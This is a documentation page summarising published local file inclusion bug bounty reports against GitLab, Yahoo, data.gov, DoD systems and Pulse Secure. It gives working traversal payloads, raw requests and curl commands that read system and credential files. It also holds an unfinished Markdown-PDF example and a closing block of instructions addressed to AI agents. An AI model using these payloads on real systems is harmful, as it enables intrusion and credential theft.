# Local File Inclusion Writeups ## Gitlab {% embed url="" %} Researcher discovered LFI on Gitlab when transferring an issue to a project. By creating an issue in project A with the following payload in the description**:** ``` ![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd) ``` Then transferring that issue from Project A to Project B, this copies the /etc/passwd file to Project B. Researcher PoC: {% hint style="danger" %} PoC removed. Todo add here {% endhint %} The issue occurs on the UploadsRewriter controller. This controller does not validate the file name or path, allowing arbitrary files to be copied using file traversal when moving an issue to another project. ``` @text.gsub(@pattern) do |markdown| file = find_file(@source_project, $~[:secret], $~[:file]) break markdown unless file.try(:exists?) klass = target_parent.is_a?(Namespace) ? NamespaceFileUploader : FileUploader moved = klass.copy_to(file, target_parent) ... def find_file(project, secret, file) uploader = FileUploader.new(project, secret: secret) uploader.retrieve_from_store!(file) uploader end ``` ## **Yahoo - URL sub parameter** {% embed url="" %} Requesting a download for any file on will return a download popup. The URL for the popup is *marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=. The dlurl parameter contains a URL encoded string `8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U`* When this is URL decoded three sub parameters are visible z8A, Ujd and hj. `8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U` The vulnerable parameter to LFI is hj. This parameter is encoded with ecb-encryption with a blocksize of 32 characters-. The researcher wrote a PoC to decrypt/encrypt a string, for convenience researcher provided following payload: `/../../../../../../../../etc/passwd` and encrypted `/../../../../../../../../79d/zGcIwd.` Using the above encrypted payload in the full URL it is possible to retrieve the /etc/passwd file. Full URL with payload: ``` https://marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.%2AQ%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F79d%2FzGcIwd ``` ## **TTS (labs.data.gov)** {% embed url="" %} Researcher discovered limited LFI on endpoint , by appending dot-dot-slash URL encoded followed by README it is possible to extract the Readme.md file. Full URL payload `https://labs.data.gov/dashboard/Docs/index/..%2fREADME` ![Viewing the Readme.md file using LFI in the URL ](/files/-MPu50GnxGmXLGtYC2OD) The LFI is limited to markdown files. In the code below which controls this functionality the index function in Docs class uses the *page* parameter which is set in the URL (which researched modified with payload). Then the document path is formed in line 7 which combines the *docs\_path* variable with the user supplied *page* variable then appended with .md. The markdown string concatenation appendage prevents any other file but markdown from being retrieved. ``` public function index($page = 'main') { $data = array(); $docs_path = ($this->config->item('docs_path')) ? $this->config->item('docs_path') : 'https://raw.githubusercontent.com/GSA/project-open-data-dashboard/master/documentation/'; $docs_path = $docs_path . $page . '.md'; $docs = @file_get_contents($docs_path); ``` ## **DoD LFI** {% embed url="" %} URL LFI using Directory Traversal / Path Traversal with dot-dot-slash characters that are URL encoded to retrieve files from the target system. Retrieving the c:/windows/System32/drivers/etc/hosts as a POC: ``` GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts HTTP/1.1 Host: ██████████ Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close ``` The URL with payload can also just be pasted into a browser: ``` https://███████/gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/System32/drivers/etc/hosts ``` Attempting to retrieve Users/Administrator/NTUser.dat to determine if the application is running as an administrator account: ``` GET /gwtmain//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fUsers/Administrator/NTUser.dat HTTP/1.1 Host: ████ Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close ``` ## DoD Pulse Secure LFI (CVE-2019-11510) {% embed url="" %} Researcher discovered vulnerable Pulse Secure SSL VPN server that did not have the patch for CVE-2019-11510. This vulnerability allows an attacker to retrieve backend files such as /etc/passwd. The other files targeted by attackers are the database file **/runtime/mtmp/lmdb/dataa/data.mdb** which contains usernames and passwords. These credentials could be used to authenticate to the SSL VPN and conduct post breach activities. ``` //Retrieve the /etc/passwd file curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" //Retrieve the /runtime/mtmp/Imdb/dataa/data.mdb file curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" ``` ## DoD {% embed url="" %} Researcher discovered LFI on a DoD application's registration page. The HTTP form body parameter registerUserInfoCommand.nextPageName is vulnerable to LFI, when entering the payload `..%2f..%2f..%2fWEB-INF%2fweb.xml` which returns the web.xml file to the user. Full HTTP body parameters with payload in registerUserInfoCommand.nextPageName: ``` registerUserInfoCommand.organization=Chantest+Corporation®isterUserInfoCommand.organizationId=49800®isterUserInfoCommand.currPageName=SearchUserOrgInfo.jsp®isterUserInfoCommand.nextPageName=..%2f..%2f..%2fWEB-INF%2fweb.xml®isterUserInfoCommand.prevPageName=jsp%2FRegistration%2FRegisterAccountInfo.jsp®isterUserInfoCommand.submitButton=Choose+This+Organization+and+Continue+%3E ``` Researcher retrieved the following files: ``` /WEB-INF/spring/mvc-config.xml /WEB-INF/spring/rest-config.xml /WEB-INF/classes/compliance/reports/adminRpt.pre.sql /WEB-INF/classes/compliance/reports/adminRpt.full.sql /WEB-INF/classes/compliance/reports/complianceStatusRptSql.sql /WEB-INF/classes/████.properties ``` With the last file containing database credentials: ``` Test.DB.URL=jdbc:oracle:thin:@localhost:1521:XE Test.DB.username=██████████ Test.DB.password=██████ ``` ## Markdown-PDF: 3rd Party Node Module {% embed url="" %} Researcher discovered LFI on a 3rd party Node.js module Markdown-PDF. This module converts markdown to pdf, however it firsts converts markdown to html5 boilerplate in index.html then PhantomJS renders the HTML and saves it to PDF. By rendering the HTML server-side before converting, this allows the input of a malicious markdown file which can retrieve local files. Illustrated below, uploading the markdown file below (test.md) will use document.write to write the contents of /etc/passwd to the markdown which will be returned to the end user after PDF conversion: ``` # this is h1 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://evanluke.gitbook.io/appsec/lfi/local-file-inclusion-1/local-file-inclusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.